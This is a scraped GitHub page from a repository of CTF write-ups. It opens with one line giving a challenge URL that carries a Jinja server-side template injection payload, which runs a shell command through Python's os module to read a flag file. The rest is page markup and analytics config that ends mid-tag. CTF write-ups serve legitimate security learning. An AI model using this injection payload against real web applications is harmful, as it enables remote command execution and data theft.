this:```https://h3y-buddy.vishwactf.com/submit?name=%7B%7Bconfig.__class__.__init__.__globals__[%27os%27].popen(%22cat$%7BIFS%7Dflag.txt%22).read()%7D%7D%3Cscript%3E```
<html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system"> <head> <meta charset="utf-8"> <link rel="dns-prefetch" href="https://github.githubassets.com"> <link rel="dns-prefetch" href="https://avatars.githubusercontent.com"> <link rel="dns-prefetch" href="https://github-cloud.s3.amazonaws.com"> <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/"> <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconnect" href="https://avatars.githubusercontent.com"> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/light-fe3f886b577a.css" /><link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/dark-a1dbeda2886c.css" /><link data-color-theme="dark_dimmed" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_dimmed-1ad5cf51dfeb.css" /><link data-color-theme="dark_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_high_contrast-11d3505dc06a.css" /><link data-color-theme="dark_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-8b800495504f.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_colorblind-daa38c88b795.css" /><link data-color-theme="light_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_high_contrast-1b9ea565820a.css" /><link data-color-theme="light_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_tritanopia-e4be9332dd6c.css" /><link data-color-theme="dark_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_tritanopia-0dcf95848dd5.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/primer-c581c4e461bb.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/global-0e278d45156f.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/github-dcaf0f44dbb1.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/code-26709f54a08d.css" /> <meta name="optimizely-datafile" content="{"groups": [], "environmentKey": "production", "rollouts": [], "typedAudiences": [], "projectId": "16737760170", "variables": [], "featureFlags": [], "experiments": [], "version": "4", "audiences": [{"conditions": "[\"or\", {\"match\": \"exact\", \"name\": \"$opt_dummy_attribute\", \"type\": \"custom_attribute\", \"value\": \"$opt_dummy_value\"}]", "id": "$opt_dummy_audience", "name": "Optimizely-Generated Audience for Backwards Compatibility"}], "anonymizeIP": true, "sdkKey": "WTc6awnGuYDdG98CYRban", "attributes": [{"id": "16822470375", "key": "user_id"}, {"id": "17143601254", "key": "spammy"}, {"id": "18175660309", "key": "organization_plan"}, {"id": "18813001570", "key": "is_logged_in"}, {"id": "19073851829", "key": "geo"}, {"id": "20175462351", "key": "requestedCurrency"}, {"id": "20785470195", "key": "country_code"}, {"id": "21656311196", "key": "opened_downgrade_dialog"}], "botFiltering": false, "accountId": "16737760170", "events": [{"experimentIds": [], "id": "17911811441", "key": "hydro_click.dashboard.teacher_toolbox_cta"}, {"experimentIds": [], "id": "18124116703", "key": "submit.organizations.complete_sign_up"}, {"experimentIds": [], "id": "18145892387", "key": "no_metric.tracked_outside_of_optimizely"}, {"experimentIds": [], "id": "18178755568", "key": "click.org_onboarding_checklist.add_repo"}, {"experimentIds": [], "id": "18180553241", "key": "submit.repository_imports.create"}, {"experimentIds": [], "id": "18186103728", "key": "click.help.learn_more_about_repository_creation"}, {"experimentIds": [], "id": "18188530140", "key": "test_event"}, {"experimentIds": [], "id": "18191963644", "key": "click.empty_org_repo_cta.transfer_repository"}, {"experimentIds": [], "id": "18195612788", "key": "click.empty_org_repo_cta.import_repository"}, {"experimentIds": [], "id": "18210945499", "key": "click.org_onboarding_checklist.invite_members"}, {"experimentIds": [], "id": "18211063248", "key": "click.empty_org_repo_cta.create_repository"}, {"experimentIds": [], "id": "18215721889", "key": "click.org_onboarding_checklist.update_profile"}, {"experimentIds": [], "id": "18224360785", "key": "click.org_onboarding_checklist.dismiss"}, {"experimentIds": [], "id": "18234832286", "key": "submit.organization_activation.complete"}, {"experimentIds": [], "id": "18252392383", "key": "submit.org_repository.create"}, {"experimentIds": [], "id": "18257551537", "key": "submit.org_member_invitation.create"}, {"experimentIds": [], "id": "18259522260", "key": "submit.organization_profile.update"}, {"experimentIds": [], "id": "18564603625", "key": "view.classroom_select_organization"}, {"experimentIds": [], "id": "18568612016", "key": "click.classroom_sign_in_click"}, {"experimentIds": [], "id": "18572592540", "key": "view.classroom_name"}, {"experimentIds": [], "id": "18574203855", "key": "click.classroom_create_organization"}, {"experimentIds": [], "id": "18582053415", "key": "click.classroom_select_organization"}, {"experimentIds": [], "id": "18589463420", "key": "click.classroom_create_classroom"}, {"experimentIds": [], "id": "18591323364", "key": "click.classroom_create_first_classroom"}, {"experimentIds": [], "id": "18591652321", "key": "click.classroom_grant_access"}, {"experimentIds": [], "id": "18607131425", "key": "view.classroom_creation"}, {"experimentIds": [], "id": "18831680583", "key": "upgrade_account_plan"}, {"experimentIds": [], "id": "19064064515", "key": "click.signup"}, {"experimentIds": [], "id": "19075373687", "key": "click.view_account_billing_page"}, {"experimentIds": [], "id": "19077355841", "key": "click.dismiss_signup_prompt"}, {"experimentIds": [], "id": "19079713938", "key": "click.contact_sales"}, {"experimentIds": [], "id": "19120963070", "key": "click.compare_account_plans"}, {"experimentIds": [], "id": "19151690317", "key": "click.upgrade_account_cta"}, {"experimentIds": [], "id": "19424193129", "key": "click.open_account_switcher"}, {"experimentIds": [], "id": "19520330825", "key": "click.visit_account_profile"}, {"experimentIds": [], "id": "19540970635", "key": "click.switch_account_context"}, {"experimentIds": [], "id": "19730198868", "key": "submit.homepage_signup"}, {"experimentIds": [], "id": "19820830627", "key": "click.homepage_signup"}, {"experimentIds": [], "id": "19988571001", "key": "click.create_enterprise_trial"}, {"experimentIds": [], "id": "20036538294", "key": "click.create_organization_team"}, {"experimentIds": [], "id": "20040653299", "key": "click.input_enterprise_trial_form"}, {"experimentIds": [], "id": "20062030003", "key": "click.continue_with_team"}, {"experimentIds": [], "id": "20068947153", "key": "click.create_organization_free"}, {"experimentIds": [], "id": "20086636658", "key": "click.signup_continue.username"}, {"experimentIds": [], "id": "20091648988", "key": "click.signup_continue.create_account"}, {"experimentIds": [], "id": "20103637615", "key": "click.signup_continue.email"}, {"experimentIds": [], "id": "20111574253", "key": "click.signup_continue.password"}, {"experimentIds": [], "id": "20120044111", "key": "view.pricing_page"}, {"experimentIds": [], "id": "20152062109", "key": "submit.create_account"}, {"experimentIds": [], "id": "20165800992", "key": "submit.upgrade_payment_form"}, {"experimentIds": [], "id": "20171520319", "key": "submit.create_organization"}, {"experimentIds": [], "id": "20222645674", "key": "click.recommended_plan_in_signup.discuss_your_needs"}, {"experimentIds": [], "id": "20227443657", "key": "submit.verify_primary_user_email"}, {"experimentIds": [], "id": "20234607160", "key": "click.recommended_plan_in_signup.try_enterprise"}, {"experimentIds": [], "id": "20238175784", "key": "click.recommended_plan_in_signup.team"}, {"experimentIds": [], "id": "20239847212", "key": "click.recommended_plan_in_signup.continue_free"}, {"experimentIds": [], "id": "20251097193", "key": "recommended_plan"}, {"experimentIds": [], "id": "20438619534", "key": "click.pricing_calculator.1_member"}, {"experimentIds": [], "id": "20456699683", "key": "click.pricing_calculator.15_members"}, {"experimentIds": [], "id": "20467868331", "key": "click.pricing_calculator.10_members"}, {"experimentIds": [], "id": "20476267432", "key": "click.trial_days_remaining"}, {"experimentIds": [], "id": "20476357660", "key": "click.discover_feature"}, {"experimentIds": [], "id": "20479287901", "key": "click.pricing_calculator.custom_members"}, {"experimentIds": [], "id": "20481107083", "key": "click.recommended_plan_in_signup.apply_teacher_benefits"}, {"experimentIds": [], "id": "20483089392", "key": "click.pricing_calculator.5_members"}, {"experimentIds": [], "id": "20484283944", "key": "click.onboarding_task"}, {"experimentIds": [], "id": "20484996281", "key": "click.recommended_plan_in_signup.apply_student_benefits"}, {"experimentIds": [], "id": "20486713726", "key": "click.onboarding_task_breadcrumb"}, {"experimentIds": [], "id": "20490791319", "key": "click.upgrade_to_enterprise"}, {"experimentIds": [], "id": "20491786766", "key": "click.talk_to_us"}, {"experimentIds": [], "id": "20494144087", "key": "click.dismiss_enterprise_trial"}, {"experimentIds": [], "id": "20499722759", "key": "completed_all_tasks"}, {"experimentIds": [], "id": "20500710104", "key": "completed_onboarding_tasks"}, {"experimentIds": [], "id": "20513160672", "key": "click.read_doc"}, {"experimentIds": [], "id": "20516196762", "key": "actions_enabled"}, {"experimentIds": [], "id": "20518980986", "key": "click.dismiss_trial_banner"}, {"experimentIds": [], "id": "20535446721", "key": "click.issue_actions_prompt.dismiss_prompt"}, {"experimentIds": [], "id": "20557002247", "key": "click.issue_actions_prompt.setup_workflow"}, {"experimentIds": [], "id": "20595070227", "key": "click.pull_request_setup_workflow"}, {"experimentIds": [], "id": "20626600314", "key": "click.seats_input"}, {"experimentIds": [], "id": "20642310305", "key": "click.decrease_seats_number"}, {"experimentIds": [], "id": "20662990045", "key": "click.increase_seats_number"}, {"experimentIds": [], "id": "20679620969", "key": "click.public_product_roadmap"}, {"experimentIds": [], "id": "20761240940", "key": "click.dismiss_survey_banner"}, {"experimentIds": [], "id": "20767210721", "key": "click.take_survey"}, {"experimentIds": [], "id": "20795281201", "key": "click.archive_list"}, {"experimentIds": [], "id": "20966790249", "key": "contact_sales.submit"}, {"experimentIds": [], "id": "20996500333", "key": "contact_sales.existing_customer"}, {"experimentIds": [], "id": "20996890162", "key": "contact_sales.blank_message_field"}, {"experimentIds": [], "id": "21000470317", "key": "contact_sales.personal_email"}, {"experimentIds": [], "id": "21002790172", "key": "contact_sales.blank_phone_field"}, {"experimentIds": [], "id": "21354412592", "key": "click.dismiss_create_readme"}, {"experimentIds": [], "id": "21366102546", "key": "click.dismiss_zero_user_content"}, {"experimentIds": [], "id": "21370252505", "key": "account_did_downgrade"}, {"experimentIds": [], "id": "21370840408", "key": "click.cta_create_readme"}, {"experimentIds": [], "id": "21375451068", "key": "click.cta_create_new_repository"}, {"experimentIds": [], "id": "21385390948", "key": "click.zero_user_content"}, {"experimentIds": [], "id": "21467712175", "key": "click.downgrade_keep"}, {"experimentIds": [], "id": "21484112202", "key": "click.downgrade"}, {"experimentIds": [], "id": "21495292213", "key": "click.downgrade_survey_exit"}, {"experimentIds": [], "id": "21508241468", "key": "click.downgrade_survey_submit"}, {"experimentIds": [], "id": "21512030356", "key": "click.downgrade_support"}, {"experimentIds": [], "id": "21539090022", "key": "click.downgrade_exit"}, {"experimentIds": [], "id": "21543640644", "key": "click_fetch_upstream"}, {"experimentIds": [], "id": "21646510300", "key": "click.move_your_work"}, {"experimentIds": [], "id": "21656151116", "key": "click.add_branch_protection_rule"}, {"experimentIds": [], "id": "21663860599", "key": "click.downgrade_dialog_open"}, {"experimentIds": [], "id": "21687860483", "key": "click.learn_about_protected_branches"}, {"experimentIds": [], "id": "21689050333", "key": "click.dismiss_protect_this_branch"}, {"experimentIds": [], "id": "21864370109", "key": "click.sign_in"}], "revision": "1372"}" /> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/wp-runtime-774bfe5ae983.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_stacktrace-parser_dist_stack-trace-parser_esm_js-node_modules_github_bro-327bbf-0aaeb22dd2a5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_soft-nav_soft-nav_ts-21fc7a4a0e8f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/environment-e059fd03252f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_js-2646a2c533e3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_details-dialog-elemen-63debe-c04540d458d4.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_relative-time-element_dist_index_js-b9368a9cb79e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_fzy_js_index_js-node_modules_github_markdown-toolbar-element_dist_index_js-e3de700a4c9d.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_index_js-node_modules_github_catalyst_-6afc16-e779583c369f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_text-ex-3415a8-7ecc10fb88d0.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-79182d-befd2b2f5880.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_view-components_app_components_primer_primer_js-node_modules_gith-6a1af4-df3bc95b06d3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/github-elements-fc0e0b89822a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/element-registry-1641411db24a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-9d9fe1859ce5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_manuelpuyol_turbo_dist_turbo_es2017-esm_js-4140d67f0cc2.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_alive-client_dist-bf5aa2-424aa982deef.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-node_modules_github_hotkey_dist_-9fc4f4-d434ddaf3207.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-35b3ae68c408.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_github_session-resume_dist-def857-2a32d97c93c5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_paste-markdown_dist_index_esm_js-node_modules_github_quote-select-15ddcc-1512e06cfee0.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_updatable-content_ts-430cacb5f7df.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_keyboard-shortcuts-helper_ts-app_assets_modules_github_be-f5afdb-8dd5f026c5b9.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_sticky-scroll-into-view_ts-0af96d15a250.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_include-fragment_ts-app_assets_modules_github_behaviors_r-4077b4-75370d1c1705.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-7883159efa9e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/behaviors-742151da9690.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-06ff531-32d7d1e94817.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/notifications-global-f5b58d24780b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_optimizely_optimizely-sdk_dist_optimizely_browser_es_min_js-node_modules-3f2a9e-65eee21d1482.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/optimizely-26cee11e2e10.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_morphdom_dist_morphdom-esm_js-node_modules_github_template-parts_lib_index_js-58417dae193c.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_virtualized-list_es_index_js-node_modules_github_memoize_dist_esm_index_js-8496b7c4b809.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_mini-throt-a33094-b03defd3289b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_mini-th-85225b-226fc85f9b72.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_ref-selector_ts-7bdefeb88a1a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/repositories-8093725f8825.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_clipboard-copy-element_dist_index_esm_js-node_modules_github_remo-8e6bec-232430bfe6da.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_decorators_js-node_modules_scroll-anchoring_di-e71893-cc1b30c51a28.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_diffs_blob-lines_ts-app_assets_modules_github_diffs_linkable-line-n-f96c66-97aade341120.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/diffs-3a64c1f69a81.js"></script> <title>CTF/README.md at f1cc03f13b000baa16f06ad59419c3c803090d17 · TwentySick/CTF · GitHub</title> <meta name="route-pattern" content="/:user_id/:repository/blob/*name(/*path)"> <meta name="current-catalog-service-hash" content="581425c0eaaa5e5e53c5b736f58a14dbe5d38b0be425901738ad0670bd1d5a33"> <meta name="request-id" content="D82F:6BE1:1C5B7BF0:1D30C7FB:64121B8C" data-pjax-transient="true"/><meta name="html-safe-nonce" content="b550edc16f7ab448dbd81f60c57c9e5d5e193b9a8c8543f64cb5c2bd2a8b95f7" data-pjax-transient="true"/><meta name="visitor-payload" content="eyJyZWZlcnJlciI6IiIsInJlcXVlc3RfaWQiOiJEODJGOjZCRTE6MUM1QjdCRjA6MUQzMEM3RkI6NjQxMjFCOEMiLCJ2aXNpdG9yX2lkIjoiODMwNTk1MDgwMjAxNjYwNzExNiIsInJlZ2lvbl9lZGdlIjoiZnJhIiwicmVnaW9uX3JlbmRlciI6ImZyYSJ9" data-pjax-transient="true"/><meta name="visitor-hmac" content="9f336d396b85be5e6c296f072c47fa6c49e80ec2de0b3c689407348362b0c7d1" data-pjax-transient="true"/> <meta name="hovercard-subject-tag" content="repository:475531499" data-turbo-transient> <meta name="github-keyboard-shortcuts" content="repository,source-code,file-tree" data-turbo-transient="true" /> <meta name="selected-link" value="repo_source" data-turbo-transient> <meta name="google-site-verification" content="c1kuD-K2HIVF635lypcsWPoD4kilo5-jA_wBFyT4uMY"> <meta name="google-site-verification" content="KT5gs8h0wvaagLKAVWq8bbeNwnZZK1r1XQysX3xurLU"> <meta name="google-site-verification" content="ZzhVyEFwb7w3e0-uOTltm8Jsck2F5StVihD0exw2fsA"> <meta name="google-site-verification" content="GXs5KoUUkNCoaAZn7wPN-t01Pywp9M3sEjnt_3_ZWPc"> <meta name="google-site-verification" content="Apib7-x98H0j5cPqHWwSMm6dNU4GmODRoqxLiDzdx9I"> <meta name="octolytics-url" content="https://collector.github.com/github/collect" /> <meta name="analytics-location" content="/<user-name>/<repo-name>/blob/show" data-turbo-transient="true" /> <meta name="user-login" content=""> <meta name="viewport" content="width=device-width"> <meta name="description" content="It's about CTFs that I've solved. There are my writeup for those challenges - CTF/README.md at f1cc03f13b000baa16f06ad59419c3c803090d17 · TwentySick/CTF"> <link rel="search" type="application/opensearchdescription+xml" href="/opensearch.xml" title="GitHub"> <link rel="fluid-icon" href="https://github.com/fluidicon.png" title="GitHub"> <meta property="fb:app_id" content="1401488693436528"> <meta name="apple-itunes-app" content="app-id=1477376905" /> <meta name="twitter:image:src" content="https://opengraph.githubassets.com/81f29a9c15bdafb93546a69a6a7ea15d74945d54addeafb41f22e1fa246ce6b8/TwentySick/CTF" /><meta name="twitter:site" content="@github" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:title" content="CTF/README.md at f1cc03f13b000baa16f06ad59419c3c803090d17 · TwentySick/CTF" /><meta name="twitter:description" content="It's about CTFs that I've solved. There are my writeup for those challenges - CTF/README.md at f1cc03f13b000baa16f06ad59419c3c803090d17 · TwentySick/CTF" /> <meta property="og:image" content="https://opengraph.githubassets.com/81f29a9c15bdafb93546a69a6a7ea15d74945d54addeafb41f22e1fa246ce6b8/TwentySick/CTF" /><meta property="og:image:alt" content="It's about CTFs that I've solved. There are my writeup for those challenges - CTF/README.md at f1cc03f13b000baa16f06ad59419c3c803090d17 · TwentySick/CTF" /><meta property="og:image:width" content="1200" /><meta property="og:image:height" content="600" /><meta property="og:site_name" content="GitHub" /><meta property="og:type" content="object" /><meta property="og:title" content="CTF/README.md at f1cc03f13b000baa16f06ad59419c3c803090d17 · TwentySick/CTF" /><meta property="og:url" content="https://github.com/TwentySick/CTF" /><meta property="og:description" content="It's about CTFs that I've solved. There are my writeup for those challenges - CTF/README.md at f1cc03f13b000baa16f06ad59419c3c803090d17 · TwentySick/CTF" /> <link rel="assets" href="https://github.githubassets.com/"> <meta name="hostname" content="github.com"> <meta name="expected-hostname" content="github.com"> <meta name="enabled-features" content="TURBO_EXPERIMENT_RISKY,IMAGE_METRIC_TRACKING,GEOJSON_AZURE_MAPS"> <meta http-equiv="x-pjax-version" content="ef97471de14f8d2285f0269e8f0f7dc70845f693d3f6ccd2dd2daae5cd1bbebe" data-turbo-track="reload"> <meta http-equiv="x-pjax-csp-version" content="2a84822a832da97f1ea76cf989a357ec70c85713a2fd8f14c8421b76bbffe38c" data-turbo-track="reload"> <meta http-equiv="x-pjax-css-version" content="adfc12179419e463f9f320d07920b1684c9b7e060d4d9cd3a6cd5d0de37ce710" data-turbo-track="reload"> <meta http-equiv="x-pjax-js-version" content="711646ae23abb27cf728346f30f81c042d4428233a0795acf0e21ed664fe9d94" data-turbo-track="reload"> <meta name="turbo-cache-control" content="no-preview" data-turbo-transient=""> <meta data-hydrostats="publish"> <meta name="go-import" content="github.com/TwentySick/CTF git https://github.com/TwentySick/CTF.git"> <meta name="octolytics-dimension-user_id" content="94169830" /><meta name="octolytics-dimension-user_login" content="TwentySick" /><meta name="octolytics-dimension-repository_id" content="475531499" /><meta name="octolytics-dimension-repository_nwo" content="TwentySick/CTF" /><meta name="octolytics-dimension-repository_public" content="true" /><meta name="octolytics-dimension-repository_is_fork" content="false" /><meta name="octolytics-dimension-repository_network_root_id" content="475531499" /><meta name="octolytics-dimension-repository_network_root_nwo" content="TwentySick/CTF" /> <link rel="canonical" href="https://github.com/TwentySick/CTF/blob/f1cc03f13b000baa16f06ad59419c3c803090d17/2022/DCTF/misc/corrupt_company/README.md" data-turbo-transient> <meta name="turbo-body-classes" content="logged-out env-production page-responsive page-blob"> <meta name="browser-stats-url" content="https://api.github.com/_private/browser/stats"> <meta name="browser-errors-url" content="https://api.github.com/_private/browser/errors"> <meta name="browser-optimizely-client-errors-url" content="https://api.github.com/_private/browser/optimizely_client/errors"> <link rel="mask-icon" href="https://github.githubassets.com/pinned-octocat.svg" color="#000000"> <link rel="alternate icon" class="js-site-favicon" type="image/png" href="https://github.githubassets.com/favicons/favicon.png"> <link rel="icon" class="js-site-favicon" type="image/svg+xml" href="https://github.githubassets.com/favicons/favicon.svg"> <meta name="theme-color" content="#1e2327"><meta name="color-scheme" content="light dark" /> <link rel="manifest" href="/manifest.json" crossOrigin="use-credentials"> </head> <body class="logged-out env-production page-responsive page-blob" style="word-wrap: break-word;"> <div data-turbo-body class="logged-out env-production page-responsive page-blob" style="word-wrap: break-word;"> <div class="position-relative js-header-wrapper "> Skip to content <span> <span></span></span> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-94fd67-04fa93bb158a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/sessions-9920eaa99f50.js"></script><header class="Header-old header-logged-out js-details-container Details position-relative f4 py-3" role="banner"> <button type="button" class="Header-backdrop d-lg-none border-0 position-fixed top-0 left-0 width-full height-full js-details-target" aria-label="Toggle navigation"> <span>Toggle navigation</span> </button> <div class="container-xl d-flex flex-column flex-lg-row flex-items-center p-responsive height-full position-relative z-1"> <div class="d-flex flex-justify-between flex-items-center width-full width-lg-auto"> <svg height="32" aria-hidden="true" viewBox="0 0 16 16" version="1.1" width="32" data-view-component="true" class="octicon octicon-mark-github"> <path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path></svg> <div class="flex-1"> Sign up </div> <div class="flex-1 flex-order-2 text-right"> <button aria-label="Toggle navigation" aria-expanded="false" type="button" data-view-component="true" class="js-details-target Button--link Button--medium Button d-lg-none color-fg-inherit p-1"> <span> <span><div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div></span> </span></button> </div> </div> <div class="HeaderMenu--logged-out p-responsive height-fit position-lg-relative d-lg-flex flex-column flex-auto pt-7 pb-4 top-0"> <div class="header-menu-wrapper d-flex flex-column flex-self-end flex-lg-row flex-justify-between flex-auto p-3 p-lg-0 rounded rounded-lg-0 mt-3 mt-lg-0"> <nav class="mt-0 px-3 px-lg-0 mb-3 mb-lg-0" aria-label="Global"> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Product <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 d-lg-flex dropdown-menu-wide"> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-workflow color-fg-subtle mr-3"> <path d="M1 3a2 2 0 0 1 2-2h6.5a2 2 0 0 1 2 2v6.5a2 2 0 0 1-2 2H7v4.063C7 16.355 7.644 17 8.438 17H12.5v-2.5a2 2 0 0 1 2-2H21a2 2 0 0 1 2 2V21a2 2 0 0 1-2 2h-6.5a2 2 0 0 1-2-2v-2.5H8.437A2.939 2.939 0 0 1 5.5 15.562V11.5H3a2 2 0 0 1-2-2Zm2-.5a.5.5 0 0 0-.5.5v6.5a.5.5 0 0 0 .5.5h6.5a.5.5 0 0 0 .5-.5V3a.5.5 0 0 0-.5-.5ZM14.5 14a.5.5 0 0 0-.5.5V21a.5.5 0 0 0 .5.5H21a.5.5 0 0 0 .5-.5v-6.5a.5.5 0 0 0-.5-.5Z"></path></svg> <div> <div class="color-fg-default h4">Actions</div> Automate any workflow </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-package color-fg-subtle mr-3"> <path d="M12.876.64V.639l8.25 4.763c.541.313.875.89.875 1.515v9.525a1.75 1.75 0 0 1-.875 1.516l-8.25 4.762a1.748 1.748 0 0 